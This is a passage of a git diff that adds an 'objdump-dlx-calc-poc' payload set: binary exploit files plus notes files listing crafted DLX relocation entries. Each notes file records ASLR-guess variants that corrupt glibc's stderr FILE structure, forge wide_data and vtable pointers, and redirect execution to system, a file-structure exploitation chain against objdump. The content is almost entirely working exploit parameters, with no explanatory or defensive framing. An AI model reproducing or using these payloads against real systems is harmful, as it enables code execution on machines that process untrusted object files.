+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin
new file mode 100644
index 0000000..2502321
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.notes
new file mode 100644
index 0000000..bcd6b45
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin
new file mode 100644
index 0000000..fe5f171
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes
new file mode 100644
index 0000000..5c95897
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin
new file mode 100644
index 0000000..088ecfa
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes
new file mode 100644
index 0000000..a68f6bc
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin
new file mode 100644
index 0000000..a4ae616
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes
new file mode 100644
index 0000000..eff03e0
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin
new file mode 100644
index 0000000..1b682a9
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.notes
new file mode 100644
index 0000000..87bd974
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin
new file mode 100644
index 0000000..8f5ab73
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes
new file mode 100644
index 0000000..3d99c7f
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin
new file mode 100644
index 0000000..7c5ed70
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes
new file mode 100644
index 0000000..7850157
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin
new file mode 100644
index 0000000..4c4baf7
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.notes
new file mode 100644
index 0000000..435b33c
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x06
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin
new file mode 100644
index 0000000..5a44876
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes
new file mode 100644
index 0000000..e625fea
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x05
+buf_delta=0xef210000
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin
new file mode 100644
index 0000000..c3bd2df
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes
new file mode 100644
index 0000000..db97a8a
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x05
+buf_delta=0xef210000
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin
new file mode 100644
index 0000000..d255eda
